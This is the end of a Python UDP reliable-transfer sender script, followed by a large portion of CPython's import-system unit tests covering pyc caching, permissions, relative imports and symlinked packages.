                self.log.write("Number of FAST RETRANSMISSION "+str(self.FTransmission)+"\n")
                self.log.write("Number of DUP ACKS received "+str(self.DupAcks)+"\n")
                self.log.write("=============================================================")
                self.log.close()
                break
        # `timeout` presumably comes from a `from socket import *` at the
        # top of the file (socket.timeout) -- TODO confirm.
        except timeout:
            self.ToutRetransmission += 1
            self.send_data_timeout(clientSocket, ack_recived + 1)
            if self.count1 > len(self.data)+1 and int(ack_recived) >= len(self.data)+1:
                break
def send_delayed_packet(self, clientSocket, delayed_packet):
    """Transmit a packet whose delivery was deferred by a threading.Timer.

    Logs a "snd/dely" event (time since self.t0, byte offset derived from
    the packet's SEQ entry in self.entire_data, and self.mass), pickles the
    packet dict and sends it on *clientSocket*.

    Runs on a timer thread, so failures (e.g. the socket or log file was
    closed after the transfer finished) are deliberately ignored.
    """
    try:
        t1 = timeit.default_timer()
        self.log.write("{0:20}{1:10}{2:10}{3:10}{4:10}{5:10}\n".format("snd/dely","{0:.3f}".format(t1-self.t0),"D",str(self.entire_data[delayed_packet['SEQ']]['len']+1),str(self.mass),str(1)))
        sending_data = pickle.dumps(delayed_packet)
        clientSocket.send(sending_data)
    except Exception:
        # Best-effort send: was a bare `except:` that also swallowed
        # SystemExit/KeyboardInterrupt and assigned a dead local; narrowed
        # to ordinary exceptions only.
        pass
# Script entry point: connect a UDP socket to the receiver given on the
# command line (argv[1] = host, argv[2] = port) and run the sender's
# send/receive loops on two threads.
clientSocket = socket(AF_INET, SOCK_DGRAM)
reciver_IP = str(sys.argv[1])
reciver_port = int(sys.argv[2])
clientSocket.connect((reciver_IP, reciver_port))
instance_of_sender = Sender()
thread1 = Thread(target=instance_of_sender.send, args=(clientSocket,))
thread2 = Thread(target=instance_of_sender.recive, args=(clientSocket,))
thread1.start()
thread2.start()
# Block until the receive loop finishes.  The original busy-waited with
# `while thread2.isAlive(): continue`, which spins a CPU core for the
# whole transfer (and isAlive() was removed in Python 3.9); join() waits
# idly for the same condition.
thread2.join()
# ----- next file: __init__.py -----
# We import importlib *ASAP* in order to test #15386
import importlib
import importlib.util
from importlib._bootstrap_external import _get_sourcefile
import builtins
import marshal
import os
import platform
import py_compile
import random
import stat
import sys
import time
import unittest
import unittest.mock as mock
import textwrap
import errno
import shutil
import contextlib
import test.support
from test.support import (
EnvironmentVarGuard, TESTFN, check_warnings, forget, is_jython,
make_legacy_pyc, rmtree, run_unittest, swap_attr, swap_item, temp_umask,
unlink, unload, create_empty_file, cpython_only, TESTFN_UNENCODABLE,
temp_dir, DirsOnSysPath)
from test.support import script_helper
from test.test_importlib.util import uncache
# threading is optional in some builds; tests that need it are guarded
# with skipUnless below.  (Dropped the unused `as e` binding.)
try:
    import threading
except ImportError:
    threading = None

# Decorator: skip bytecode-writing tests when the interpreter runs with
# -B / PYTHONDONTWRITEBYTECODE.
skip_if_dont_write_bytecode = unittest.skipIf(
    sys.dont_write_bytecode,
    "test meaningful only when writing bytecode")
def remove_files(name):
    """Delete all importable artifacts for module *name* (source, legacy
    bytecode, .pyw, Jython class file) and the __pycache__ directory."""
    for suffix in (".py", ".pyc", ".pyw", "$py.class"):
        unlink(name + suffix)
    rmtree('__pycache__')
@contextlib.contextmanager
def _ready_to_import(name=None, source=""):
    """Prepare a throwaway importable module.

    Creates a module file *name* (default "spam") with *source* inside a
    temporary directory, puts that directory at the front of sys.path, and
    temporarily removes any already-imported module of the same name.
    Yields (name, path); everything is reverted on exit.

    Fix: the original removed tempdir from sys.path only on the success
    path, so an exception in the with-body leaked the entry.  Cleanup now
    happens unconditionally in ``finally``.
    """
    name = name or "spam"
    with temp_dir() as tempdir:
        path = script_helper.make_script(tempdir, name, source)
        old_module = sys.modules.pop(name, None)
        sys.path.insert(0, tempdir)
        try:
            yield name, path
        finally:
            if tempdir in sys.path:
                sys.path.remove(tempdir)
            if old_module is not None:
                sys.modules[name] = old_module
            elif name in sys.modules:
                del sys.modules[name]
class ImportTests(unittest.TestCase):
    """Core behaviors of ``import`` / ``__import__``: error types, case
    sensitivity, reloads, bytecode handling, and concurrent imports."""

    def setUp(self):
        remove_files(TESTFN)
        importlib.invalidate_caches()

    def tearDown(self):
        unload(TESTFN)

    def test_import_raises_ModuleNotFoundError(self):
        with self.assertRaises(ModuleNotFoundError):
            import something_that_should_not_exist_anywhere

    def test_from_import_missing_module_raises_ModuleNotFoundError(self):
        with self.assertRaises(ModuleNotFoundError):
            from something_that_should_not_exist_anywhere import blah

    def test_from_import_missing_attr_raises_ImportError(self):
        with self.assertRaises(ImportError):
            from importlib import something_that_should_not_exist_anywhere

    def test_case_sensitivity(self):
        # Brief digression to test that import is case-sensitive: if we got
        # this far, we know for sure that "random" exists.
        with self.assertRaises(ImportError):
            import RAnDoM

    def test_double_const(self):
        # Another brief digression to test the accuracy of manifest float
        # constants.
        from test import double_const  # don't blink -- that *was* the test

    def test_import(self):
        def test_with_extension(ext):
            # The extension is normally ".py", perhaps ".pyw".
            source = TESTFN + ext
            if is_jython:
                pyc = TESTFN + "$py.class"
            else:
                pyc = TESTFN + ".pyc"
            # Write a module with two random attributes, then import it and
            # verify the attributes round-trip.
            with open(source, "w") as f:
                print("# This tests Python's ability to import a",
                      ext, "file.", file=f)
                a = random.randrange(1000)
                b = random.randrange(1000)
                print("a =", a, file=f)
                print("b =", b, file=f)
            if TESTFN in sys.modules:
                del sys.modules[TESTFN]
            importlib.invalidate_caches()
            try:
                try:
                    mod = __import__(TESTFN)
                except ImportError as err:
                    self.fail("import from %s failed: %s" % (ext, err))
                self.assertEqual(mod.a, a,
                    "module loaded (%s) but contents invalid" % mod)
                self.assertEqual(mod.b, b,
                    "module loaded (%s) but contents invalid" % mod)
            finally:
                forget(TESTFN)
                unlink(source)
                unlink(pyc)
        sys.path.insert(0, os.curdir)
        try:
            test_with_extension(".py")
            if sys.platform.startswith("win"):
                # Windows filesystems are case-insensitive; all casings of
                # the extension must import.
                for ext in [".PY", ".Py", ".pY", ".pyw", ".PYW", ".pYw"]:
                    test_with_extension(ext)
        finally:
            del sys.path[0]

    def test_module_with_large_stack(self, module='longlist'):
        # Regression test for http://bugs.python.org/issue561858.
        filename = module + '.py'
        # Create a file with a list of 65000 elements.
        with open(filename, 'w') as f:
            f.write('d = [\n')
            for i in range(65000):
                f.write('"",\n')
            f.write(']')
        try:
            # Compile & remove .py file; we only need .pyc.
            # Bytecode must be relocated from the PEP 3147 bytecode-only location.
            py_compile.compile(filename)
        finally:
            unlink(filename)
        # Need to be able to load from current dir.
        sys.path.append('')
        importlib.invalidate_caches()
        namespace = {}
        try:
            make_legacy_pyc(filename)
            # This used to crash.
            exec('import ' + module, None, namespace)
        finally:
            # Cleanup.
            del sys.path[-1]
            unlink(filename + 'c')
            unlink(filename + 'o')
            # Remove references to the module (unload the module)
            namespace.clear()
            try:
                del sys.modules[module]
            except KeyError:
                pass

    def test_failing_import_sticks(self):
        source = TESTFN + ".py"
        with open(source, "w") as f:
            print("a = 1/0", file=f)
        # New in 2.4, we shouldn't be able to import that no matter how often
        # we try.
        sys.path.insert(0, os.curdir)
        importlib.invalidate_caches()
        if TESTFN in sys.modules:
            del sys.modules[TESTFN]
        try:
            for i in [1, 2, 3]:
                self.assertRaises(ZeroDivisionError, __import__, TESTFN)
                self.assertNotIn(TESTFN, sys.modules,
                                 "damaged module in sys.modules on %i try" % i)
        finally:
            del sys.path[0]
            remove_files(TESTFN)

    def test_import_name_binding(self):
        # import x.y.z binds x in the current namespace
        import test as x
        import test.support
        self.assertIs(x, test, x.__name__)
        self.assertTrue(hasattr(test.support, "__file__"))
        # import x.y.z as w binds z as w
        import test.support as y
        self.assertIs(y, test.support, y.__name__)

    def test_failing_reload(self):
        # A failing reload should leave the module object in sys.modules.
        source = TESTFN + os.extsep + "py"
        with open(source, "w") as f:
            f.write("a = 1\nb=2\n")
        sys.path.insert(0, os.curdir)
        try:
            mod = __import__(TESTFN)
            self.assertIn(TESTFN, sys.modules)
            self.assertEqual(mod.a, 1, "module has wrong attribute values")
            self.assertEqual(mod.b, 2, "module has wrong attribute values")

            # On WinXP, just replacing the .py file wasn't enough to
            # convince reload() to reparse it.  Maybe the timestamp didn't
            # move enough.  We force it to get reparsed by removing the
            # compiled file too.
            remove_files(TESTFN)

            # Now damage the module.
            with open(source, "w") as f:
                f.write("a = 10\nb=20//0\n")

            self.assertRaises(ZeroDivisionError, importlib.reload, mod)
            # But we still expect the module to be in sys.modules.
            mod = sys.modules.get(TESTFN)
            self.assertIsNotNone(mod, "expected module to be in sys.modules")

            # We should have replaced a w/ 10, but the old b value should
            # stick.
            self.assertEqual(mod.a, 10, "module has wrong attribute values")
            self.assertEqual(mod.b, 2, "module has wrong attribute values")
        finally:
            del sys.path[0]
            remove_files(TESTFN)
            unload(TESTFN)

    @skip_if_dont_write_bytecode
    def test_file_to_source(self):
        # check if __file__ points to the source file where available
        source = TESTFN + ".py"
        with open(source, "w") as f:
            f.write("test = None\n")

        sys.path.insert(0, os.curdir)
        try:
            mod = __import__(TESTFN)
            self.assertTrue(mod.__file__.endswith('.py'))
            os.remove(source)
            del sys.modules[TESTFN]
            make_legacy_pyc(source)
            importlib.invalidate_caches()
            mod = __import__(TESTFN)
            base, ext = os.path.splitext(mod.__file__)
            # With only bytecode left, __file__ must point at the .pyc.
            self.assertEqual(ext, '.pyc')
        finally:
            del sys.path[0]
            remove_files(TESTFN)
            if TESTFN in sys.modules:
                del sys.modules[TESTFN]

    def test_import_by_filename(self):
        path = os.path.abspath(TESTFN)
        encoding = sys.getfilesystemencoding()
        try:
            path.encode(encoding)
        except UnicodeEncodeError:
            self.skipTest('path is not encodable to {}'.format(encoding))
        # Importing by a filesystem path (not a module name) must fail.
        with self.assertRaises(ImportError) as c:
            __import__(path)

    def test_import_in_del_does_not_crash(self):
        # Issue 4236
        testfn = script_helper.make_script('', TESTFN, textwrap.dedent("""\
            import sys
            class C:
               def __del__(self):
                  import importlib
            sys.argv.insert(0, C())
            """))
        script_helper.assert_python_ok(testfn)

    @skip_if_dont_write_bytecode
    def test_timestamp_overflow(self):
        # A modification timestamp larger than 2**32 should not be a problem
        # when importing a module (issue #11235).
        sys.path.insert(0, os.curdir)
        try:
            source = TESTFN + ".py"
            compiled = importlib.util.cache_from_source(source)
            with open(source, 'w') as f:
                pass
            try:
                os.utime(source, (2 ** 33 - 5, 2 ** 33 - 5))
            except OverflowError:
                self.skipTest("cannot set modification time to large integer")
            except OSError as e:
                if e.errno not in (getattr(errno, 'EOVERFLOW', None),
                                   getattr(errno, 'EINVAL', None)):
                    raise
                self.skipTest("cannot set modification time to large integer ({})".format(e))
            __import__(TESTFN)
            # The pyc file was created.
            os.stat(compiled)
        finally:
            del sys.path[0]
            remove_files(TESTFN)

    def test_bogus_fromlist(self):
        try:
            __import__('http', fromlist=['blah'])
        except ImportError:
            self.fail("fromlist must allow bogus names")

    @cpython_only
    def test_delete_builtins_import(self):
        args = ["-c", "del __builtins__.__import__; import os"]
        popen = script_helper.spawn_python(*args)
        stdout, stderr = popen.communicate()
        self.assertIn(b"ImportError", stdout)

    def test_from_import_message_for_nonexistent_module(self):
        with self.assertRaisesRegex(ImportError, "^No module named 'bogus'"):
            from bogus import foo

    def test_from_import_message_for_existing_module(self):
        with self.assertRaisesRegex(ImportError, "^cannot import name 'bogus'"):
            from re import bogus

    def test_from_import_AttributeError(self):
        # Issue #24492: trying to import an attribute that raises an
        # AttributeError should lead to an ImportError.
        class AlwaysAttributeError:
            def __getattr__(self, _):
                raise AttributeError

        module_name = 'test_from_import_AttributeError'
        self.addCleanup(unload, module_name)
        sys.modules[module_name] = AlwaysAttributeError()
        with self.assertRaises(ImportError):
            from test_from_import_AttributeError import does_not_exist

    @cpython_only
    def test_issue31492(self):
        # There shouldn't be an assertion failure in case of failing to import
        # from a module with a bad __name__ attribute, or in case of failing
        # to access an attribute of such a module.
        with swap_attr(os, '__name__', None):
            with self.assertRaises(ImportError):
                from os import does_not_exist

            with self.assertRaises(AttributeError):
                os.does_not_exist

    @unittest.skipUnless(threading != None, "concurrency requires threading")
    def test_concurrency(self):
        # Two threads importing the same package simultaneously must not
        # corrupt sys.modules or raise.
        sys.path.insert(0, os.path.join(os.path.dirname(__file__), 'data'))
        try:
            exc = None
            def run():
                event.wait()
                try:
                    import package
                except BaseException as e:
                    nonlocal exc
                    exc = e

            for i in range(10):
                event = threading.Event()
                threads = [threading.Thread(target=run) for x in range(2)]
                try:
                    with test.support.start_threads(threads, event.set):
                        time.sleep(0)
                finally:
                    sys.modules.pop('package', None)
                    sys.modules.pop('package.submodule', None)
            if exc is not None:
                raise exc
        finally:
            del sys.path[0]
@skip_if_dont_write_bytecode
class FilePermissionTests(unittest.TestCase):
    # tests for file mode on cached .pyc files

    @unittest.skipUnless(os.name == 'posix',
                         "test meaningful only on posix systems")
    def test_creation_mode(self):
        # A freshly written .pyc honors the umask and carries no exec bits.
        mask = 0o022
        with temp_umask(mask), _ready_to_import() as (name, path):
            cached_path = importlib.util.cache_from_source(path)
            module = __import__(name)
            if not os.path.exists(cached_path):
                self.fail("__import__ did not result in creation of "
                          "a .pyc file")
            stat_info = os.stat(cached_path)

        # Check that the umask is respected, and the executable bits
        # aren't set.
        self.assertEqual(oct(stat.S_IMODE(stat_info.st_mode)),
                         oct(0o666 & ~mask))

    @unittest.skipUnless(os.name == 'posix',
                         "test meaningful only on posix systems")
    def test_cached_mode_issue_2051(self):
        # permissions of .pyc should match those of .py, regardless of mask
        mode = 0o600
        with temp_umask(0o022), _ready_to_import() as (name, path):
            cached_path = importlib.util.cache_from_source(path)
            os.chmod(path, mode)
            __import__(name)
            if not os.path.exists(cached_path):
                self.fail("__import__ did not result in creation of "
                          "a .pyc file")
            stat_info = os.stat(cached_path)

        self.assertEqual(oct(stat.S_IMODE(stat_info.st_mode)), oct(mode))

    @unittest.skipUnless(os.name == 'posix',
                         "test meaningful only on posix systems")
    def test_cached_readonly(self):
        # A read-only .py still yields a writable .pyc (issue #6074).
        mode = 0o400
        with temp_umask(0o022), _ready_to_import() as (name, path):
            cached_path = importlib.util.cache_from_source(path)
            os.chmod(path, mode)
            __import__(name)
            if not os.path.exists(cached_path):
                self.fail("__import__ did not result in creation of "
                          "a .pyc file")
            stat_info = os.stat(cached_path)

        expected = mode | 0o200 # Account for fix for issue #6074
        self.assertEqual(oct(stat.S_IMODE(stat_info.st_mode)), oct(expected))

    def test_pyc_always_writable(self):
        # Initially read-only .pyc files on Windows used to cause problems
        # with later updates, see issue #6074 for details
        with _ready_to_import() as (name, path):
            # Write a Python file, make it read-only and import it
            with open(path, 'w') as f:
                f.write("x = 'original'\n")
            # Tweak the mtime of the source to ensure pyc gets updated later
            s = os.stat(path)
            os.utime(path, (s.st_atime, s.st_mtime-100000000))
            os.chmod(path, 0o400)
            m = __import__(name)
            self.assertEqual(m.x, 'original')
            # Change the file and then reimport it
            os.chmod(path, 0o600)
            with open(path, 'w') as f:
                f.write("x = 'rewritten'\n")
            unload(name)
            importlib.invalidate_caches()
            m = __import__(name)
            self.assertEqual(m.x, 'rewritten')
            # Now delete the source file and check the pyc was rewritten
            unlink(path)
            unload(name)
            importlib.invalidate_caches()
            bytecode_only = path + "c"
            os.rename(importlib.util.cache_from_source(path), bytecode_only)
            m = __import__(name)
            self.assertEqual(m.x, 'rewritten')
class PycRewritingTests(unittest.TestCase):
    # Test that the `co_filename` attribute on code objects always points
    # to the right file, even when various things happen (e.g. both the .py
    # and the .pyc file are renamed).

    module_name = "unlikely_module_name"
    # Module that records three filename views: the frame's code filename,
    # __file__, and a nested function's code filename.
    module_source = """
import sys
code_filename = sys._getframe().f_code.co_filename
module_filename = __file__
constant = 1
def func():
    pass
func_filename = func.__code__.co_filename
"""
    dir_name = os.path.abspath(TESTFN)
    file_name = os.path.join(dir_name, module_name) + os.extsep + "py"
    compiled_name = importlib.util.cache_from_source(file_name)

    def setUp(self):
        self.sys_path = sys.path[:]
        self.orig_module = sys.modules.pop(self.module_name, None)
        os.mkdir(self.dir_name)
        with open(self.file_name, "w") as f:
            f.write(self.module_source)
        sys.path.insert(0, self.dir_name)
        importlib.invalidate_caches()

    def tearDown(self):
        sys.path[:] = self.sys_path
        if self.orig_module is not None:
            sys.modules[self.module_name] = self.orig_module
        else:
            unload(self.module_name)
        unlink(self.file_name)
        unlink(self.compiled_name)
        rmtree(self.dir_name)

    def import_module(self):
        # Import the test module and return the module object.
        ns = globals()
        __import__(self.module_name, ns, ns)
        return sys.modules[self.module_name]

    def test_basics(self):
        mod = self.import_module()
        self.assertEqual(mod.module_filename, self.file_name)
        self.assertEqual(mod.code_filename, self.file_name)
        self.assertEqual(mod.func_filename, self.file_name)
        # Second import (now from the cached bytecode) must agree.
        del sys.modules[self.module_name]
        mod = self.import_module()
        self.assertEqual(mod.module_filename, self.file_name)
        self.assertEqual(mod.code_filename, self.file_name)
        self.assertEqual(mod.func_filename, self.file_name)

    def test_incorrect_code_name(self):
        # Compile with a deliberately wrong display filename; import must
        # still report the real source path.
        py_compile.compile(self.file_name, dfile="another_module.py")
        mod = self.import_module()
        self.assertEqual(mod.module_filename, self.file_name)
        self.assertEqual(mod.code_filename, self.file_name)
        self.assertEqual(mod.func_filename, self.file_name)

    def test_module_without_source(self):
        target = "another_module.py"
        py_compile.compile(self.file_name, dfile=target)
        os.remove(self.file_name)
        pyc_file = make_legacy_pyc(self.file_name)
        importlib.invalidate_caches()
        mod = self.import_module()
        self.assertEqual(mod.module_filename, pyc_file)
        self.assertEqual(mod.code_filename, target)
        self.assertEqual(mod.func_filename, target)

    def test_foreign_code(self):
        # Splice a code object compiled elsewhere into the .pyc's constants
        # and check its co_filename survives the import untouched.
        py_compile.compile(self.file_name)
        with open(self.compiled_name, "rb") as f:
            header = f.read(12)
            code = marshal.load(f)
        constants = list(code.co_consts)
        foreign_code = importlib.import_module.__code__
        pos = constants.index(1)
        constants[pos] = foreign_code
        code = type(code)(code.co_argcount, code.co_kwonlyargcount,
                          code.co_nlocals, code.co_stacksize,
                          code.co_flags, code.co_code, tuple(constants),
                          code.co_names, code.co_varnames, code.co_filename,
                          code.co_name, code.co_firstlineno, code.co_lnotab,
                          code.co_freevars, code.co_cellvars)
        with open(self.compiled_name, "wb") as f:
            f.write(header)
            marshal.dump(code, f)
        mod = self.import_module()
        self.assertEqual(mod.constant.co_filename, foreign_code.co_filename)
class PathsTests(unittest.TestCase):
    """Imports from unusual sys.path entries (trailing slash, UNC paths)."""

    # Candidate directory names, including non-ASCII ones.
    SAMPLES = ('test', 'test\u00e4\u00f6\u00fc\u00df', 'test\u00e9\u00e8',
               'test\u00b0\u00b3\u00b2')
    path = TESTFN

    def setUp(self):
        os.mkdir(self.path)
        self.syspath = sys.path[:]

    def tearDown(self):
        rmtree(self.path)
        sys.path[:] = self.syspath

    # Regression test for http://bugs.python.org/issue1293.
    def test_trailing_slash(self):
        with open(os.path.join(self.path, 'test_trailing_slash.py'), 'w') as f:
            f.write("testdata = 'test_trailing_slash'")
        sys.path.append(self.path+'/')
        mod = __import__("test_trailing_slash")
        self.assertEqual(mod.testdata, 'test_trailing_slash')
        unload("test_trailing_slash")

    # Regression test for http://bugs.python.org/issue3677.
    @unittest.skipUnless(sys.platform == 'win32', 'Windows-specific')
    def test_UNC_path(self):
        with open(os.path.join(self.path, 'test_unc_path.py'), 'w') as f:
            f.write("testdata = 'test_unc_path'")
        importlib.invalidate_caches()
        # Create the UNC path, like \\myhost\c$\foo\bar.
        path = os.path.abspath(self.path)
        import socket
        hn = socket.gethostname()
        drive = path[0]
        unc = "\\\\%s\\%s$"%(hn, drive)
        unc += path[2:]
        try:
            os.listdir(unc)
        except OSError as e:
            if e.errno in (errno.EPERM, errno.EACCES, errno.ENOENT):
                # See issue #15338
                self.skipTest("cannot access administrative share %r" % (unc,))
            raise
        sys.path.insert(0, unc)
        try:
            mod = __import__("test_unc_path")
        except ImportError as e:
            self.fail("could not import 'test_unc_path' from %r: %r"
                      % (unc, e))
        self.assertEqual(mod.testdata, 'test_unc_path')
        self.assertTrue(mod.__file__.startswith(unc), mod.__file__)
        unload("test_unc_path")
class RelativeImportTests(unittest.TestCase):
    """Explicit relative imports: resolution via __package__/__name__ and
    failure modes when the context is wrong."""

    def tearDown(self):
        unload("test.relimport")
    setUp = tearDown

    def test_relimport_star(self):
        # This will import * from .test_import.
        from .. import relimport
        self.assertTrue(hasattr(relimport, "RelativeImportTests"))

    def test_issue3221(self):
        # Note for mergers: the 'absolute' tests from the 2.x branch
        # are missing in Py3k because implicit relative imports are
        # a thing of the past
        #
        # Regression test for http://bugs.python.org/issue3221.
        def check_relative():
            exec("from . import relimport", ns)

        # Check relative import OK with __package__ and __name__ correct
        ns = dict(__package__='test', __name__='test.notarealmodule')
        check_relative()

        # Check relative import OK with only __name__ wrong
        ns = dict(__package__='test', __name__='notarealpkg.notarealmodule')
        check_relative()

        # Check relative import fails with only __package__ wrong
        ns = dict(__package__='foo', __name__='test.notarealmodule')
        self.assertRaises(ModuleNotFoundError, check_relative)

        # Check relative import fails with __package__ and __name__ wrong
        ns = dict(__package__='foo', __name__='notarealpkg.notarealmodule')
        self.assertRaises(ModuleNotFoundError, check_relative)

        # Check relative import fails with package set to a non-string
        ns = dict(__package__=object())
        self.assertRaises(TypeError, check_relative)

    def test_absolute_import_without_future(self):
        # If explicit relative import syntax is used, then do not try
        # to perform an absolute import in the face of failure.
        # Issue #7902.
        with self.assertRaises(ImportError):
            from .os import sep
            self.fail("explicit relative import triggered an "
                      "implicit absolute import")

    def test_import_from_non_package(self):
        path = os.path.join(os.path.dirname(__file__), 'data', 'package2')
        with uncache('submodule1', 'submodule2'), DirsOnSysPath(path):
            with self.assertRaises(ImportError):
                import submodule1
            self.assertNotIn('submodule1', sys.modules)
            self.assertNotIn('submodule2', sys.modules)

    def test_import_from_unloaded_package(self):
        with uncache('package2', 'package2.submodule1', 'package2.submodule2'), \
             DirsOnSysPath(os.path.join(os.path.dirname(__file__), 'data')):
            import package2.submodule1
            package2.submodule1.submodule2
class OverridingImportBuiltinTests(unittest.TestCase):
    """Effects of replacing ``builtins.__import__`` vs shadowing it in
    a module's globals."""

    def test_override_builtin(self):
        # Test that overriding builtins.__import__ can bypass sys.modules.
        import os

        def foo():
            import os
            return os
        self.assertEqual(foo(), os)  # Quick sanity check.

        with swap_attr(builtins, "__import__", lambda *x: 5):
            self.assertEqual(foo(), 5)

        # Test what happens when we shadow __import__ in globals(); this
        # currently does not impact the import process, but if this changes,
        # other code will need to change, so keep this test as a tripwire.
        with swap_item(globals(), "__import__", lambda *x: 5):
            self.assertEqual(foo(), os)
class PycacheTests(unittest.TestCase):
    # Test the various PEP 3147/488-related behaviors.

    def _clean(self):
        # Remove the module, its cache directory and its source.
        forget(TESTFN)
        rmtree('__pycache__')
        unlink(self.source)

    def setUp(self):
        self.source = TESTFN + '.py'
        self._clean()
        with open(self.source, 'w') as fp:
            print('# This is a test file written by test_import.py', file=fp)
        sys.path.insert(0, os.curdir)
        importlib.invalidate_caches()

    def tearDown(self):
        assert sys.path[0] == os.curdir, 'Unexpected sys.path[0]'
        del sys.path[0]
        self._clean()

    @skip_if_dont_write_bytecode
    def test_import_pyc_path(self):
        # Importing a source module creates __pycache__ and the pyc inside.
        self.assertFalse(os.path.exists('__pycache__'))
        __import__(TESTFN)
        self.assertTrue(os.path.exists('__pycache__'))
        pyc_path = importlib.util.cache_from_source(self.source)
        self.assertTrue(os.path.exists(pyc_path),
                        'bytecode file {!r} for {!r} does not '
                        'exist'.format(pyc_path, TESTFN))

    @unittest.skipUnless(os.name == 'posix',
                         "test meaningful only on posix systems")
    @unittest.skipIf(hasattr(os, 'geteuid') and os.geteuid() == 0,
            "due to varying filesystem permission semantics (issue #11956)")
    @skip_if_dont_write_bytecode
    def test_unwritable_directory(self):
        # When the umask causes the new __pycache__ directory to be
        # unwritable, the import still succeeds but no .pyc file is written.
        with temp_umask(0o222):
            __import__(TESTFN)
        self.assertTrue(os.path.exists('__pycache__'))
        pyc_path = importlib.util.cache_from_source(self.source)
        self.assertFalse(os.path.exists(pyc_path),
                         'bytecode file {!r} for {!r} '
                         'exists'.format(pyc_path, TESTFN))

    @skip_if_dont_write_bytecode
    def test_missing_source(self):
        # With PEP 3147 cache layout, removing the source but leaving the pyc
        # file does not satisfy the import.
        __import__(TESTFN)
        pyc_file = importlib.util.cache_from_source(self.source)
        self.assertTrue(os.path.exists(pyc_file))
        os.remove(self.source)
        forget(TESTFN)
        importlib.invalidate_caches()
        self.assertRaises(ImportError, __import__, TESTFN)

    @skip_if_dont_write_bytecode
    def test_missing_source_legacy(self):
        # Like test_missing_source() except that for backward compatibility,
        # when the pyc file lives where the py file would have been (and named
        # without the tag), it is importable.  The __file__ of the imported
        # module is the pyc location.
        __import__(TESTFN)
        # pyc_file gets removed in _clean() via tearDown().
        pyc_file = make_legacy_pyc(self.source)
        os.remove(self.source)
        unload(TESTFN)
        importlib.invalidate_caches()
        m = __import__(TESTFN)
        try:
            self.assertEqual(m.__file__,
                             os.path.join(os.curdir, os.path.relpath(pyc_file)))
        finally:
            os.remove(pyc_file)

    def test___cached__(self):
        # Modules now also have an __cached__ that points to the pyc file.
        m = __import__(TESTFN)
        pyc_file = importlib.util.cache_from_source(TESTFN + '.py')
        self.assertEqual(m.__cached__, os.path.join(os.curdir, pyc_file))

    @skip_if_dont_write_bytecode
    def test___cached___legacy_pyc(self):
        # Like test___cached__() except that for backward compatibility,
        # when the pyc file lives where the py file would have been (and named
        # without the tag), it is importable.  The __cached__ of the imported
        # module is the pyc location.
        __import__(TESTFN)
        # pyc_file gets removed in _clean() via tearDown().
        pyc_file = make_legacy_pyc(self.source)
        os.remove(self.source)
        unload(TESTFN)
        importlib.invalidate_caches()
        m = __import__(TESTFN)
        self.assertEqual(m.__cached__,
                         os.path.join(os.curdir, os.path.relpath(pyc_file)))

    @skip_if_dont_write_bytecode
    def test_package___cached__(self):
        # Like test___cached__ but for packages.
        def cleanup():
            rmtree('pep3147')
            unload('pep3147.foo')
            unload('pep3147')
        os.mkdir('pep3147')
        self.addCleanup(cleanup)
        # Touch the __init__.py
        with open(os.path.join('pep3147', '__init__.py'), 'w'):
            pass
        with open(os.path.join('pep3147', 'foo.py'), 'w'):
            pass
        importlib.invalidate_caches()
        m = __import__('pep3147.foo')
        init_pyc = importlib.util.cache_from_source(
            os.path.join('pep3147', '__init__.py'))
        self.assertEqual(m.__cached__, os.path.join(os.curdir, init_pyc))
        foo_pyc = importlib.util.cache_from_source(os.path.join('pep3147', 'foo.py'))
        self.assertEqual(sys.modules['pep3147.foo'].__cached__,
                         os.path.join(os.curdir, foo_pyc))

    def test_package___cached___from_pyc(self):
        # Like test___cached__ but ensuring __cached__ when imported from a
        # PEP 3147 pyc file.
        def cleanup():
            rmtree('pep3147')
            unload('pep3147.foo')
            unload('pep3147')
        os.mkdir('pep3147')
        self.addCleanup(cleanup)
        # Touch the __init__.py
        with open(os.path.join('pep3147', '__init__.py'), 'w'):
            pass
        with open(os.path.join('pep3147', 'foo.py'), 'w'):
            pass
        importlib.invalidate_caches()
        # Import once to create the bytecode, then unload and re-import so
        # the second import is served from the pyc.
        m = __import__('pep3147.foo')
        unload('pep3147.foo')
        unload('pep3147')
        importlib.invalidate_caches()
        m = __import__('pep3147.foo')
        init_pyc = importlib.util.cache_from_source(
            os.path.join('pep3147', '__init__.py'))
        self.assertEqual(m.__cached__, os.path.join(os.curdir, init_pyc))
        foo_pyc = importlib.util.cache_from_source(os.path.join('pep3147', 'foo.py'))
        self.assertEqual(sys.modules['pep3147.foo'].__cached__,
                         os.path.join(os.curdir, foo_pyc))

    def test_recompute_pyc_same_second(self):
        # Even when the source file doesn't change timestamp, a change in
        # source size is enough to trigger recomputation of the pyc file.
        __import__(TESTFN)
        unload(TESTFN)
        with open(self.source, 'a') as fp:
            print("x = 5", file=fp)
        m = __import__(TESTFN)
        self.assertEqual(m.x, 5)
class TestSymbolicallyLinkedPackage(unittest.TestCase):
    """A package reached through a directory symlink must be importable."""

    package_name = 'sample'
    tagged = package_name + '-tagged'

    def setUp(self):
        test.support.rmtree(self.tagged)
        test.support.rmtree(self.package_name)
        self.orig_sys_path = sys.path[:]

        # create a sample package; imagine you have a package with a tag and
        # you want to symbolically link it from its untagged name.
        os.mkdir(self.tagged)
        self.addCleanup(test.support.rmtree, self.tagged)
        init_file = os.path.join(self.tagged, '__init__.py')
        test.support.create_empty_file(init_file)
        assert os.path.exists(init_file)

        # now create a symlink to the tagged package
        # sample -> sample-tagged
        os.symlink(self.tagged, self.package_name, target_is_directory=True)
        self.addCleanup(test.support.unlink, self.package_name)
        importlib.invalidate_caches()

        self.assertEqual(os.path.isdir(self.package_name), True)
        assert os.path.isfile(os.path.join(self.package_name, '__init__.py'))

    def tearDown(self):
        sys.path[:] = self.orig_sys_path

    # regression test for issue6727
    @unittest.skipUnless(
        not hasattr(sys, 'getwindowsversion')
        or sys.getwindowsversion() >= (6, 0),
        "Windows Vista or later required")
    @test.support.skip_unless_symlink
    def test_symlinked_dir_importable(self):
        # make sure sample can only be imported from the current directory.
        sys.path[:] = ['.']
        assert os.path.exists(self.package_name)
        assert os.path.exists(os.path.join(self.package_name, '__init__.py'))

        # Try to import the package
        importlib.import_module(self.package_name)
@cpython_only
class ImportlibBootstrapTests(unittest.TestCase):
    # These tests check that importlib is bootstrapped.

    def test_frozen_importlib(self):
        """The frozen importlib must be registered in sys.modules."""
        mod = sys.modules['_frozen_importlib']
        self.assertTrue(mod)

    def test_frozen_importlib_is_bootstrap(self):
        """_frozen_importlib must be the very same module object as
        importlib._bootstrap (identity, not just equality)."""
        from importlib import _bootstrap
        mod = sys.modules['_frozen_importlib']
